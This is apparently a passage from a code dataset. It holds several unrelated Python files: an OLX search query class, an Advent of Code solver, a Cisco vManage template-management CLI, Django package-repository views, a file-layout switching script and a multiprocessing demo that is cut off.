text stringlengths 38 1.54M |
|---|
'''
Created on Jun 29, 2016
@author: mateusz
'''
from src.mvc.model.olx.offer_search_query import OfferSearchQuery
class ApartmentOfferSearchQuery(OfferSearchQuery):
    '''
    Build an OLX search query for apartments for rent.

    Only supplies the apartments-for-rent base URL; all query-string
    construction comes from the OfferSearchQuery parent class.
    '''
    # OLX offer query url example:
    # http://olx.pl/nieruchomosci/mieszkania/wynajem/krakow/q-kurdwan%C3%B3w/?
    # search%5Bfilter_float_price%3Afrom%5D=800&
    # search%5Bfilter_float_price%3Ato%5D=1600&
    # search%5Bfilter_enum_rooms%5D%5B0%5D=two&
    # search%5Bfilter_float_m%3Afrom%5D=40&
    # search%5Bfilter_float_m%3Ato%5D=70
    def __init__(self, *args):
        # Set before calling the parent constructor, which presumably
        # reads it while building the query URL -- TODO confirm.
        self.OLX_QUERY_BASE_URL = u'http://olx.pl/nieruchomosci/mieszkania/wynajem'
        super(ApartmentOfferSearchQuery, self).__init__(*args)
def parse_instructions(lines):
    """Parse AoC 2015 day 6 lines into (action, start, end) tuples.

    'turn on/off x,y through x2,y2' -> ('on'|'off', [x, y], [x2, y2]);
    'toggle x,y through x2,y2' -> ('toggle', [x, y], [x2, y2]).
    Coordinates are kept as strings, as in the original.
    """
    instructions = []
    for line in lines:
        parts = line.split(' ')
        if len(parts) == 5:  # turn on/off x,y through x',y'
            instructions.append((parts[1], parts[2].split(','), parts[4].split(',')))
        elif len(parts) == 4:  # toggle x,y through x',y'
            instructions.append((parts[0], parts[1].split(','), parts[3].split(',')))
    return instructions


def total_brightness(instructions):
    """Apply the instructions to a 1000x1000 brightness grid (part 2 rules).

    'on' adds 1, 'off' subtracts 1 (floored at 0), 'toggle' adds 2.
    Returns the total brightness of the grid.
    """
    lights = [0] * 1000000
    for action, start, end in instructions:
        for x in range(int(start[0]), int(end[0]) + 1):
            for y in range(int(start[1]), int(end[1]) + 1):
                idx = y * 1000 + x
                if action == 'on':
                    lights[idx] += 1
                elif action == 'off':
                    # never dim below zero
                    lights[idx] = max(0, lights[idx] - 1)
                elif action == 'toggle':
                    lights[idx] += 2
    return sum(lights)


if __name__ == '__main__':
    # `with` guarantees the input file is closed (the original leaked it).
    with open('6.in') as f:
        print(total_brightness(parse_instructions(f.read().splitlines())))
|
import requests
import urllib3
import click
import json
from rich.console import Console
from rich.table import Table
# from rich.text import Text
from vmanage.api.authenticate import authentication
from vmanage.constants import vmanage
from vmanage.api.vpn import generate_dict_vpn_ip_nexthops
import ast
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Root click group; the `device` and `feature` sub-groups are attached
# at the bottom of this module.
@click.group(name="template")
def cli_template():
    """Commands to manage Device and Feature Templates: list, show, create, delete
    """
# Sub-group for device-template operations (attached to cli_template below).
@click.group()
def device():
    """
    Manage Device Templates: list, show, create, delete
    """
# Sub-group for feature-template operations (attached to cli_template below).
@click.group()
def feature():
    """
    Manage Feature Templates: list, show, create, delete
    """
# Sub-group holding the per-type "create" commands (attached to `feature` below).
@click.group(name="create")
def feature_create():
    """
    Create Feature Template: banner, system, vpn, vpn-int, ...
    """
@device.command(name="list", help="Get Device Template List")
@click.option('--default/--no-default', help="Print system default templates", default=False)
def template_list(default):
    """Print a table of device templates, hiding factory defaults unless --default."""
    headers = authentication(vmanage)
    url = (
        "https://" + f'{vmanage["host"]}:{vmanage["port"]}/dataservice'
        + "/template/device"
    )
    response = requests.get(url=url, headers=headers, verify=False)
    if response.status_code != 200:
        print("Failed to get list of devices " + str(response.text))
        exit()
    items = response.json()['data']
    table = Table(
        "Template Name", "Device Model", "Template ID",
        "Attached devices", "Template version")
    for item in items:
        # factory-default templates are skipped unless explicitly requested
        if item["factoryDefault"] and not default:
            continue
        table.add_row(
            f'[green]{item["templateName"]}[/green]',
            f'[blue]{item["deviceType"]}[/blue]',
            f'[magenta]{item["templateId"]}[/magenta]',
            f'[orange1]{item["devicesAttached"]}[/orange1]',
            f'[bright_yellow]{item["templateAttached"]}[/bright_yellow]')
    Console().print(table)
@device.command(name="delete", help="Delete a Device Template")
@click.option("--template_id", help="ID of the template you wish to delete")
def delete_template(template_id):
    """Delete the device template identified by --template_id."""
    headers = authentication(vmanage)
    base_url = "https://" + f'{vmanage["host"]}:{vmanage["port"]}/dataservice'
    api = f"/template/device/{template_id}?api_key=/template/device"
    url = base_url + api
    response = requests.delete(url=url, headers=headers, verify=False)
    if response.status_code == 200:
        # fixed "Succed" typo; wording now matches delete_feature_template
        print("Succeed to delete the template " + str(template_id))
    else:
        print("Failed to delete the template " + str(template_id))
        exit()
@device.command(name="show", help="Show details of a Device Template")
@click.argument('template_id')
def show_template(template_id):
    """Pretty-print the JSON definition of the device template TEMPLATE_ID."""
    headers = authentication(vmanage)
    base = "https://" + f'{vmanage["host"]}:{vmanage["port"]}/dataservice'
    url = base + f"/template/device/object/{template_id}?api_key=/template/device"
    response = requests.get(url=url, headers=headers, verify=False)
    if response.status_code != 200:
        print("Failed to show the template " + str(template_id))
        exit()
    print(json.dumps(response.json(), indent=4))
@feature.command(name="list", help="Get Feature Template list")
@click.option('--default/--no-default', help="Print system default templates", default=False)
def feature_list(default):
    """Print a table of feature templates, hiding factory defaults unless --default."""
    headers = authentication(vmanage)
    base_url = "https://" + f'{vmanage["host"]}:{vmanage["port"]}/dataservice'
    api = "/template/feature"
    url = base_url + api
    response = requests.get(url=url, headers=headers, verify=False)
    if response.status_code == 200:
        items = response.json()['data']
    else:
        # message fixed: this command lists feature templates, not devices
        # (was copy-pasted from template_list)
        print("Failed to get list of feature templates " + str(response.text))
        exit()
    console = Console()
    # First two columns take default sizing; the rest get explicit widths.
    table = Table(
        "Template Name", "Template Type")
    table.add_column("Device Model", width=15)
    table.add_column("Template ID", width=36)
    table.add_column("Attached devices", width=10)
    table.add_column("Device Templates", width=10)
    for item in items:
        if not default and item["factoryDefault"]:
            continue
        table.add_row(
            f'[green]{item["templateName"]}[/green]',
            f'[blue]{item["templateType"]}[/blue]',
            f'[blue]{item["deviceType"]}[/blue]',
            f'[magenta]{item["templateId"]}[/magenta]',
            f'[orange1]{item["devicesAttached"]}[/orange1]',
            f'[bright_green]{item["attachedMastersCount"]}[/bright_green]')
    console.print(table)
@feature.command(name="delete", help="Delete a Feature Template")
@click.argument("template_id")
def delete_feature_template(template_id):
    """Delete the feature template identified by TEMPLATE_ID."""
    headers = authentication(vmanage)
    url = (
        "https://" + f'{vmanage["host"]}:{vmanage["port"]}/dataservice'
        + f"/template/feature/{template_id}?api_key=/template/feature"
    )
    response = requests.delete(url=url, headers=headers, verify=False)
    if response.status_code != 200:
        print("Failed to delete the template " + str(template_id))
        exit()
    print("Succeed to delete the template " + str(template_id))
@feature.command(name="show", help="Show details of a Feature Template")
@click.argument('template_id')
def show_feature_template(template_id):
    """Pretty-print the JSON definition of the feature template TEMPLATE_ID."""
    headers = authentication(vmanage)
    base = "https://" + f'{vmanage["host"]}:{vmanage["port"]}/dataservice'
    url = base + f"/template/feature/object/{template_id}?api_key=/template/feature"
    response = requests.get(url=url, headers=headers, verify=False)
    if response.status_code != 200:
        print("Failed to show the template " + str(template_id))
        exit()
    print(json.dumps(response.json(), indent=4))
class PythonLiteralOption(click.Option):
    """Click option whose value is parsed as a Python literal (e.g. a list)."""

    def type_cast_value(self, ctx, value):
        # Click also passes declared defaults through here; a default like []
        # is already a Python object, and ast.literal_eval would reject it.
        if not isinstance(value, str):
            return value
        try:
            return ast.literal_eval(value)
        except (ValueError, SyntaxError) as err:
            # narrowed from a bare `except:`; literal_eval raises these
            # for malformed input
            raise click.BadParameter(value) from err
@feature_create.command(name="banner", help="Create a Banner Feature Template")
@click.option(
    "--types", "-t", cls=PythonLiteralOption, default=[],
    help="List of device types, ex. '[\"vedge-cloud\", \"vedge-1000\"]'",
)
@click.option("--name", "-n", help="Name of the Template']")
def create_feature_template(types, name):
    """Create a "banner" feature template with fixed login/MOTD text.

    Usage: sdwancli template feature create banner -t '["vedge-cloud",
    "vedge-1000"]' -n VE-banner-2
    """
    # NOTE(review): the --name help text ends with a stray "']" -- candidate
    # for cleanup (same in the other create commands).
    headers = authentication(vmanage)
    base_url = "https://" + f'{vmanage["host"]}:{vmanage["port"]}/dataservice'
    api = "/template/feature"
    url = base_url + api
    # Banner payload: login and MOTD texts are hard-coded constants.
    payload = {
        "deviceType": types,
        "templateType": "banner",
        "templateMinVersion": "15.0.0",
        "templateDefinition": {
            "login": {
                "vipObjectType": "object",
                "vipType": "constant",
                "vipValue": "This is vEdge Cloud Login banner",
                "vipVariableName": "banner_login"
            },
            "motd": {
                "vipObjectType": "object",
                "vipType": "constant",
                "vipValue": "This is vEdge Cloud MOTD banner",
                "vipVariableName": "banner_motd"
            }
        },
        "factoryDefault": "false",
        "templateName": name,
        "templateDescription": "VE-Banner"
    }
    response = requests.post(
        url=url, data=json.dumps(payload), headers=headers, verify=False)
    if response.status_code == 200:
        # vManage returns the new template's metadata as JSON
        print(json.dumps(response.json(), indent=4))
    else:
        print("Failed to create the template ")
        exit()
@feature_create.command(name="system", help="Create a Feature Template System")
@click.option(
    "--types", "-t", cls=PythonLiteralOption, default=[],
    help="List of device types, ex. '[\"vedge-cloud\", \"vedge-1000\"]'",
)
@click.option("--name", "-n", help="Name of the Template']")
@click.option("--time_zone", "-time", help="Timezone setting of the System']")
def create_system_feature_template(types, name, time_zone):
    """Create a "system-vedge" feature template.

    Usage: sdwancli template feature create system -t '["vedge-cloud",
    "vedge-1000"]' -n VE-system-1 -time UTC
    """
    headers = authentication(vmanage)
    base_url = "https://" + f'{vmanage["host"]}:{vmanage["port"]}/dataservice'
    api = "/template/feature"
    url = base_url + api
    # Timezone is a constant from the CLI; site-id/system-ip/host-name are
    # left as device-specific variables to be filled at attach time.
    payload = {
        "deviceType": types,
        "templateType": "system-vedge",
        "templateMinVersion": "15.0.0",
        "templateDefinition": {
            "clock": {
                "timezone": {
                    "vipObjectType": "object",
                    "vipType": "constant",
                    "vipValue": time_zone,
                    "vipVariableName": "system_timezone"
                }
            },
            "site-id": {
                "vipObjectType": "object",
                "vipType": "variableName",
                "vipValue": "",
                "vipVariableName": "system_site_id"
            },
            "system-ip": {
                "vipObjectType": "object",
                "vipType": "variableName",
                "vipValue": "",
                "vipVariableName": "system_system_ip"
            },
            "host-name": {
                "vipObjectType": "object",
                "vipType": "variableName",
                "vipValue": "",
                "vipVariableName": "system_host_name"
            },
            "console-baud-rate": {
                "vipObjectType": "object",
                "vipType": "ignore",
                "vipValue": "_empty",
                "vipVariableName": "system_console_baud_rate"
            }
        },
        "factoryDefault": "false",
        "templateName": name,
        "templateDescription": "VE-System"
    }
    response = requests.post(
        url=url, data=json.dumps(payload), headers=headers, verify=False)
    if response.status_code == 200:
        print(json.dumps(response.json(), indent=4))
    else:
        print("Failed to create the template ")
        exit()
@feature_create.command(name="vpn", help="Create a Feature Template System")
@click.option(
    "--types", "-t", cls=PythonLiteralOption, default=[],
    help="List of device types, ex. '[\"vedge-cloud\", \"vedge-1000\"]'",
)
@click.option("--name", "-n", help="Name of the Template']")
@click.option("--vpn_id", "-id", help="VPN ID of the VPN Template']")
@click.option("--description", "-d", help="Description of the VPN Template']")
@click.option("--prefix", "-p", help="Description of the VPN Template']", required=False)
@click.option(
    "--nexthops", "-nh", required=False, cls=PythonLiteralOption, default=[],
    help="List of nexthops ip address names, ex. '[\"vpn_g2_if\", \"vpn_g1_if\"]'")
def create_vpn_feature_template(types, name, vpn_id, description, prefix, nexthops):
    """Create a "vpn-vedge" feature template.

    With --nexthops, a static IPv4 route for --prefix is added whose
    next-hop addresses are templated variables; otherwise only vpn-id and
    name are configured.

    Usage: sdwancli template feature create vpn -t '["vedge-cloud",
    "vedge-1000"]' -n VE-vpn-10 -id 10 -d corporate
    """
    # NOTE(review): the decorator help text says "Create a Feature Template
    # System" and --prefix's help is a copy-paste of --description's --
    # candidates for cleanup.
    headers = authentication(vmanage)
    base_url = "https://" + f'{vmanage["host"]}:{vmanage["port"]}/dataservice'
    api = "/template/feature"
    url = base_url + api
    if nexthops:
        # Variant with a static route: next-hop list is expanded by
        # generate_dict_vpn_ip_nexthops into per-address variable entries.
        payload = {
            "deviceType": types,
            "templateType": "vpn-vedge",
            "templateMinVersion": "15.0.0",
            "templateDefinition": {
                "vpn-id": {
                    "vipObjectType": "object",
                    "vipType": "constant",
                    "vipValue": vpn_id
                },
                "name": {
                    "vipObjectType": "object",
                    "vipType": "constant",
                    "vipValue": description,
                    "vipVariableName": "vpn_name"
                },
                "ip": {
                    "route": {
                        "vipType": "constant",
                        "vipValue": [
                            {
                                "prefix": {
                                    "vipObjectType": "object",
                                    "vipType": "constant",
                                    "vipValue": prefix,
                                    "vipVariableName": "vpn_ipv4_ip_prefix"
                                },
                                "vipOptional": "false",
                                "next-hop": {
                                    "vipType": "constant",
                                    "vipValue": generate_dict_vpn_ip_nexthops(nexthops),
                                    "vipObjectType": "tree",
                                    "vipPrimaryKey": [
                                        "address"
                                    ]
                                },
                                "priority-order": [
                                    "prefix",
                                    "next-hop"
                                ]
                            }
                        ],
                        "vipObjectType": "tree",
                        "vipPrimaryKey": [
                            "prefix"
                        ]
                    },
                    "gre-route": {},
                    "ipsec-route": {},
                    "service-route": {}
                }
            },
            "factoryDefault": "false",
            "templateName": name,
            "templateDescription": "VPN feature template"
        }
    else:
        # Minimal variant: vpn-id and name only.
        payload = {
            "deviceType": types,
            "templateType": "vpn-vedge",
            "templateMinVersion": "15.0.0",
            "templateDefinition": {
                "vpn-id": {
                    "vipObjectType": "object",
                    "vipType": "constant",
                    "vipValue": vpn_id
                },
                "name": {
                    "vipObjectType": "object",
                    "vipType": "constant",
                    "vipValue": description,
                    "vipVariableName": "vpn_name"
                },
            },
            "factoryDefault": "false",
            "templateName": name,
            "templateDescription": "VPN feature template"
        }
    response = requests.post(
        url=url, data=json.dumps(payload), headers=headers, verify=False)
    if response.status_code == 200:
        print(json.dumps(response.json(), indent=4))
    else:
        print("Failed to create the template ")
        exit()
@feature_create.command(name="vpn-int", help="Create a Feature Template System")
@click.option(
    "--types", "-t", cls=PythonLiteralOption, default=[],
    help="List of device types, ex. '[\"vedge-cloud\", \"vedge-1000\"]'",
)
@click.option("--name", "-n", help="Name of the Template']")
@click.option("--if_name", "-i", help="Interface Name of the VPN INT Template']")
@click.option("--description", "-d", help="Description of the VPN INT']", required=False)
@click.option("--ip_addr_name", "-ip", help="IPv4 variable name']", required=False)
@click.option("--color", "-c", help="Color of the interface']", required=False)
def create_vpn_int_feature_template(types, name, if_name, description, ip_addr_name, color):
    """Create a "vpn-vedge-interface" feature template.

    With --ip_addr_name, a full tunnel-enabled interface is configured
    (templated IPv4 address, tunnel color, allowed services); otherwise
    only the interface name and description are set.

    Usage: sdwancli template feature create vpn-int -t '["vedge-cloud",
    "vedge-1000"]' -n VE-vpn0-int -i ge0/0 -ip vpn0_if_ip -c default
    """
    headers = authentication(vmanage)
    base_url = "https://" + f'{vmanage["host"]}:{vmanage["port"]}/dataservice'
    api = "/template/feature"
    url = base_url + api
    if ip_addr_name:
        # Tunnel-interface variant: IP address comes from a device variable
        # named by --ip_addr_name, tunnel color from --color.
        payload = {
            "deviceType": types,
            "templateType": "vpn-vedge-interface",
            "templateMinVersion": "15.0.0",
            "templateDefinition": {
                "if-name": {
                    "vipObjectType": "object",
                    "vipType": "constant",
                    "vipValue": if_name,
                    "vipVariableName": "vpn_if_name"
                },
                "description": {
                    "vipObjectType": "object",
                    "vipType": "constant",
                    "vipValue": description,
                    "vipVariableName": "vpn_if_description"
                },
                "ip": {
                    "address": {
                        "vipObjectType": "object",
                        "vipType": "variableName",
                        "vipValue": "",
                        "vipVariableName": ip_addr_name
                    }
                },
                "shutdown": {
                    "vipObjectType": "object",
                    "vipType": "constant",
                    "vipValue": "false",
                    "vipVariableName": "vpn_if_shutdown"
                },
                "tunnel-interface": {
                    "color": {
                        "value": {
                            "vipObjectType": "object",
                            "vipType": "constant",
                            "vipValue": color,
                            "vipVariableName": "vpn_if_tunnel_color_value"
                        },
                        "restrict": {
                            "vipObjectType": "node-only",
                            "vipType": "ignore",
                            "vipValue": "false",
                            "vipVariableName": "vpn_if_tunnel_color_restrict"
                        }
                    },
                    # services allowed through the tunnel interface
                    "allow-service": {
                        "sshd": {
                            "vipObjectType": "object",
                            "vipType": "constant",
                            "vipValue": "true",
                            "vipVariableName": "vpn_if_tunnel_sshd"
                        },
                        "all": {
                            "vipObjectType": "object",
                            "vipType": "constant",
                            "vipValue": "true",
                            "vipVariableName": "vpn_if_tunnel_all"
                        },
                        "netconf": {
                            "vipObjectType": "object",
                            "vipType": "constant",
                            "vipValue": "true",
                            "vipVariableName": "vpn_if_tunnel_netconf"
                        }
                    }
                }
            },
            "factoryDefault": "false",
            "templateName": name,
            "templateDescription": "VPN Interface Ethernet feature template"
        }
    else:
        # Minimal variant: interface name and description only.
        payload = {
            "deviceType": types,
            "templateType": "vpn-vedge-interface",
            "templateMinVersion": "15.0.0",
            "templateDefinition": {
                "if-name": {
                    "vipObjectType": "object",
                    "vipType": "constant",
                    "vipValue": if_name,
                    "vipVariableName": "vpn_if_name"
                },
                "description": {
                    "vipObjectType": "object",
                    "vipType": "constant",
                    "vipValue": description,
                    "vipVariableName": "vpn_if_description"
                }
            },
            "factoryDefault": "false",
            "templateName": name,
            "templateDescription": "VPN Interface Ethernet feature template"
        }
    response = requests.post(
        url=url, data=json.dumps(payload), headers=headers, verify=False)
    if response.status_code == 200:
        print(json.dumps(response.json(), indent=4))
    else:
        print("Failed to create the template ")
        exit()
# Wire the command tree: template -> {device, feature}, feature -> create.
cli_template.add_command(device)
cli_template.add_command(feature)
feature.add_command(feature_create)
|
from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import get_object_or_404, render_to_response
from desktopsite.apps.repository.models import *
from desktopsite.apps.repository.forms import *
from desktopsite.apps.repository.categories import REPOSITORY_CATEGORIES
from django.contrib.auth.decorators import login_required
from django.template import RequestContext
def index(request):
    """Repository landing page: categories plus latest/top-rated/featured lists."""
    context = {
        'categories': REPOSITORY_CATEGORIES,
        'latest': Version.objects.all().order_by("-creation_date")[:8],
        'top_rated': Rating.objects.top_rated(8),
        'featured': Rating.objects.featured(5),
    }
    return render_to_response('repository/index.html', context,
                              context_instance=RequestContext(request))
def byLetter(request, letter):
    """List packages whose name starts with *letter*."""
    matches = Package.objects.filter(name__startswith=letter)
    title = "Packages starting with \"%s\"" % letter
    return showResults(request, title, matches)
def byCategory(request, category):
    """List packages belonging to *category*."""
    matches = Package.objects.filter(category__exact=category)
    title = "Packages in \"%s\"" % category
    return showResults(request, title, matches)
@login_required
def userPackages(request):
    """List the packages maintained by the logged-in user."""
    mine = Package.objects.filter(maintainer__exact=request.user)
    return showResults(request, "My Packages", mine)
def search(request):
    """Search packages by name substring; an empty query yields no results."""
    # QueryDict.get replaces the legacy has_key/[] dance (has_key was
    # removed in Python 3 / modern Django).
    query = request.GET.get("q", "")
    if query:
        results = Package.objects.filter(name__contains=query)
    else:
        results = []
    return showResults(request, "Results for \"%s\"" % query, results)
def showResults(request, title, resultset):
    """Render a result list page with *title* (falling back to "Search Results")."""
    context = {
        'results': resultset,
        'title': title or "Search Results",
    }
    return render_to_response('repository/results.html', context,
                              context_instance=RequestContext(request))
def package(request, sysname):
    """Package detail page, showing its most recent version (or none)."""
    pak = get_object_or_404(Package, sysname=sysname)
    versions = pak.get_versions_desc()
    latest = versions[0] if versions else {}
    return render_to_response('repository/package.html', {
        'package': pak,
        'version': latest,
    }, context_instance=RequestContext(request))
def version(request, sysname, version):
    """Detail page for one named version of a package."""
    pak = get_object_or_404(Package, sysname=sysname)
    ver = get_object_or_404(Version, package=pak, name=version)
    return render_to_response('repository/version.html', {
        'package': pak,
        'version': ver,
    }, context_instance=RequestContext(request))
@login_required
def saveRating(request):
    """Save the current user's 0-5 rating for a version; a value of 0 deletes it.

    Returns a plain-text "ok", or a rejection message for out-of-range or
    non-numeric values.
    """
    version = get_object_or_404(Version, pk=request.POST["versionId"])
    value = request.POST["value"]
    # The original guard compared the POSTed *string* against ints and was
    # inverted (`not (value < 0 or value > 5)`), so it rejected valid
    # ratings path-wise never and let bad ones through. Parse and validate.
    try:
        score = int(value)
    except ValueError:
        score = -1
    if score < 0 or score > 5:
        return HttpResponse("nice try asshole", mimetype="text/plain")
    try:
        rating, created = Rating.objects.get_or_create(version=version, user=request.user,
                                                       defaults={'score': value})
    except Rating.MultipleObjectsReturned:
        # this happens on occasion, not sure why
        Rating.objects.filter(version=version, user=request.user).delete()
        rating = Rating(version=version, user=request.user)
    if score == 0:
        # a zero rating means "remove my rating"
        rating.delete()
    else:
        rating.score = value
        rating.save()
    return HttpResponse("ok", mimetype="text/plain")
@login_required
def newPackage(request):
    """Create a new package owned by the current user."""
    if request.method == 'POST':
        form = PackageForm(request.POST, request.FILES)
        if form.is_valid():
            pak = form.save(commit=False)
            pak.maintainer = request.user
            pak.save()
            request.user.message_set.create(message='New Package Created')
            return HttpResponseRedirect(pak.get_absolute_url())
        # invalid POST falls through and re-renders the bound form
    else:
        form = PackageForm()
    return render_to_response("repository/form.html", context_instance=RequestContext(request, {
        'title': "New Package",
        'form': form,
    }))
@login_required
def newVersion(request, sysname):
    """Create a new Version for an existing package (maintainer only)."""
    package = get_object_or_404(Package, sysname=sysname)
    if not package.user_is_maintainer():
        return HttpResponseRedirect(package.get_absolute_url())
    if request.method == 'POST':
        form = VersionForm(request.POST, request.FILES)
        # The form's validation presumably needs the target package
        # (e.g. for uniqueness checks) -- TODO confirm.
        form._requested_package = package
        is_valid = form.is_valid()
        if is_valid:
            version = form.save() #commit=False omitted purposefully!
            # NOTE(review): `package` is assigned *after* save() and never
            # re-saved here; unless the form itself persists the package
            # link (via _requested_package), this assignment is lost --
            # verify against VersionForm.save().
            version.package = package
            version.calc_md5sum()
            request.user.message_set.create(message='New Version Created')
            return HttpResponseRedirect(version.get_absolute_url())
    else:
        form = VersionForm()
    return render_to_response("repository/form.html", context_instance=RequestContext(request, {
        'title': "New Version for %s" % package.name,
        'form': form,
    }))
@login_required
def editPackage(request, sysname):
    """Edit an existing package; only its maintainer may do so."""
    pak = get_object_or_404(Package, sysname=sysname)
    if not pak.user_is_maintainer():
        return HttpResponseRedirect(pak.get_absolute_url())
    if request.method == 'POST':
        form = PackageForm(request.POST, request.FILES, instance=pak)
        if form.is_valid():
            pak = form.save(commit=False)
            pak.save()
            request.user.message_set.create(message='Changes Saved')
            return HttpResponseRedirect(pak.get_absolute_url())
        # invalid POST falls through and re-renders the bound form
    else:
        form = PackageForm(instance=pak)
    return render_to_response("repository/form.html", context_instance=RequestContext(request, {
        'title': "Editing %s" % pak.name,
        'form': form,
    }))
@login_required
def editVersion(request, sysname, version):
    """Edit one version of a package; only its maintainer may do so."""
    pak = get_object_or_404(Package, sysname=sysname)
    ver = get_object_or_404(Version, name=version, package=pak)
    if not pak.user_is_maintainer():
        return HttpResponseRedirect(pak.get_absolute_url())
    if request.method == 'POST':
        form = EditVersionForm(request.POST, request.FILES, instance=ver)
        if form.is_valid():
            ver = form.save(commit=False)
            ver.package = pak
            ver.save()
            request.user.message_set.create(message='Changes Saved')
            return HttpResponseRedirect(ver.get_absolute_url())
        # invalid POST falls through and re-renders the bound form
    else:
        form = EditVersionForm(instance=ver)
    return render_to_response("repository/form.html", context_instance=RequestContext(request, {
        'title': "Editing %s %s" % (pak.name, ver.name),
        'form': form,
    }))
@login_required
def deleteVersion(request, sysname, version):
    """Confirm-and-delete flow for one version (maintainer only)."""
    pak = get_object_or_404(Package, sysname=sysname)
    ver = get_object_or_404(Version, name=version, package=pak)
    if not pak.user_is_maintainer():
        return HttpResponseRedirect(pak.get_absolute_url())
    return doDeleteView(request, ver, pak.get_absolute_url())
@login_required
def deletePackage(request, sysname):
    """Confirm-and-delete flow for a whole package (maintainer only)."""
    pak = get_object_or_404(Package, sysname=sysname)
    if not pak.user_is_maintainer():
        return HttpResponseRedirect(pak.get_absolute_url())
    return doDeleteView(request, pak, "/repository/")
def doDeleteView(request, object, finishUrl):
    """Generic confirm-and-delete view.

    GET renders a confirmation page; POST with "Yes" deletes *object* and
    redirects to *finishUrl*, any other POST redirects back to the object.
    NOTE(review): the `object` parameter shadows the builtin; name kept for
    backward compatibility with keyword callers.
    """
    if request.method == 'POST':
        # `in` replaces the legacy has_key (removed in Python 3)
        if "Yes" in request.POST:
            # message built before delete so %s still has the identity
            request.user.message_set.create(message='%s Deleted.' % object)
            object.delete()
            return HttpResponseRedirect(finishUrl)
        else:
            return HttpResponseRedirect(object.get_absolute_url())
    else:
        return render_to_response("repository/delete.html", context_instance=RequestContext(request, {
            'object': object,
        }))
|
import os, sys, argparse, stat, traceback, shutil, subprocess, logging, json
import glob
logging.basicConfig(level=logging.WARNING)
log = logging.getLogger(os.path.basename(__file__))
# Move table: [source glob, destination name].
# dest None => flatten every match of the glob into the current directory
# (destination is the file's basename, see buildMoves()).
# NOTE(review): the last four entries contain unescaped backslashes; "\V"
# is not a recognised escape so it stays a literal backslash, but this is
# fragile -- consider raw strings r"..." (verify intent).
mapping = [
    [ "backend/*.cpp" , None ],
    [ "backend/*.d" , None ],
    [ "backend/*.h" , None ],
    [ "backend/*.i" , None ],
    [ "backend/*.l" , None ],
    [ "backend/*.lo" , None ],
    [ "backend/*.y" , None ],
    [ "backend/*.yo" , None ],
    [ "dbupdate/*.cpp" , None ],
    [ "dbupdate/*.d" , None ],
    [ "dbupdate/*.h" , None ],
    [ "dbupdate/*.i" , None ],
    [ "network/*.cpp" , None ],
    [ "network/*.d" , None ],
    [ "network/*.h" , None ],
    [ "network/*.i" , None ],
    [ "tools/*.cpp" , None ],
    [ "tools/*.d" , None ],
    [ "tools/*.h" , None ],
    [ "tools/*.i" , None ],
    [ "kernel/*.cpp" , None ],
    [ "kernel/*.d" , None ],
    [ "kernel/*.h" , None ],
    [ "kernel/*.i" , None ],
    [ "backend\VpOpenDialog_Not.h" , "VpOpenDialog.h" ],
    [ "kernel\VpFileMapping_Win32_1x.h" , "VpFileMapping.h" ],
    [ "kernel\VpSocket_Win32_1x.h" , "VpSocket.h" ],
    [ "kernel\Vp_Win32_1x.h" , "Vp.h" ],
]
# source->dest and dest->source indexes, kept mutually consistent by addMove().
sourceMap = {}
destMap = {}
# State file; its presence means the tree is currently in Windows layout.
movesFile = ".windowsMoves.json"
def addMove(source, dest):
    """Record a source->dest move, keeping sourceMap/destMap consistent.

    On a collision (two sources claiming one dest, or one source claiming
    two dests) the earlier entry is dropped with a warning.
    """
    if dest in destMap:
        # closing quote added to the message (was unbalanced)
        log.warning(
            "destination collision at '" + dest + "': '" + source + "' and '" + destMap[dest] + "'"
        )
        del sourceMap[destMap[dest]]
    if source in sourceMap:
        log.warning(
            "source collision at '" + source + "': '" + dest + "' and '" + sourceMap[source] + "'"
        )
        del destMap[sourceMap[source]]
    sourceMap[source] = dest
    destMap[dest] = source
def buildMoves():
    """Populate sourceMap/destMap from `mapping` by globbing the tree.

    Entries with an explicit destination must match exactly one file;
    entries with dest None flatten each match to its basename.
    """
    for maps in mapping:
        srcglob = maps[0]
        dest = maps[1]
        moves = glob.glob(srcglob)
        if dest is not None:
            if len(moves) == 0:
                log.warning(
                    "destination '" + dest + "' has no source: '" + str(srcglob)
                )
            elif len(moves) == 1:
                source = moves[0]
                addMove(source, dest)
            else:
                # several files matched a glob that maps to a single
                # destination -- ambiguous, refuse to continue
                raise RuntimeError(
                    "collision within a single glob: " + srcglob + str(moves)
                )
        else:
            if len(moves) == 0:
                log.warning(
                    "mapping '" + str(srcglob) + "' had no matches"
                )
            # flatten: each match moves to its basename in the cwd
            for move in moves:
                source = move
                dest = os.path.basename(source)
                addMove(source, dest)
def saveMoves(filename):
    """Persist destMap (dest -> original source) so the moves can be undone."""
    with open(filename, "w") as fo:
        json.dump(destMap, fo)
def readMoves(filename):
    """Load a saved moves file into sourceMap.

    The file stores dest -> source (see saveMoves), so loading it as
    sourceMap makes the subsequent doMoves() *reverse* the recorded
    moves -- presumably how the "and back again" direction works.
    """
    global sourceMap
    with open(filename) as fi:
        sourceMap = json.load(fi)
def doMoves(movesDict):
    """Move every src file to its dest as described by movesDict.

    Uses .items() instead of the Python-2-only .iteritems(), which works
    identically on Python 2 and keeps the script runnable on Python 3.
    """
    for src, dest in movesDict.items():
        shutil.move(src, dest)
def main(args):
    """Switch the tree layout under <directory>/src.

    If the state file is absent: compute and perform the Windows-layout
    moves and record them. If present: replay the recorded (inverted)
    moves to restore the original layout and remove the state file.
    """
    root = args.directory
    os.chdir(os.path.join(root, "src"))
    # NOTE(review): leftover debug output -- candidate for removal
    print os.path.exists(movesFile)
    if not os.path.exists(movesFile):
        print "Building File Moves"
        buildMoves()
        saveMoves(movesFile)
    else:
        readMoves(movesFile)
        os.remove(movesFile)
    print "Moving " + str(len(sourceMap)) + " files"
    doMoves(sourceMap)
if __name__ == "__main__":
    # Single positional argument: the project root containing src/.
    parser = argparse.ArgumentParser(
        description="switchWindowsBuild.py moves vision source to a layout that builds in Visual Studio. And back again"
    )
    parser.add_argument("directory",
        help="directory to switch"
    )
    main(parser.parse_args())
|
from time import ctime,sleep
import multiprocessing
def talk(content, loop):
    """Print *content* with a timestamp *loop* times, pausing 2s between prints."""
    for _ in range(loop):
        print("Talk:%s %s" % (content, ctime()))
        sleep(2)
def write(content, loop):
    """Print *content* with a timestamp *loop* times, pausing 3s between prints."""
    for _ in range(loop):
        print("write:%s %s" % (content, ctime()))
        sleep(3)
def _run_demo():
    """Start the two demo processes and wait for both to finish."""
    process = [
        multiprocessing.Process(target=talk, args=('hello,51zxw', 2)),
        multiprocessing.Process(target=write, args=('Python', 2)),
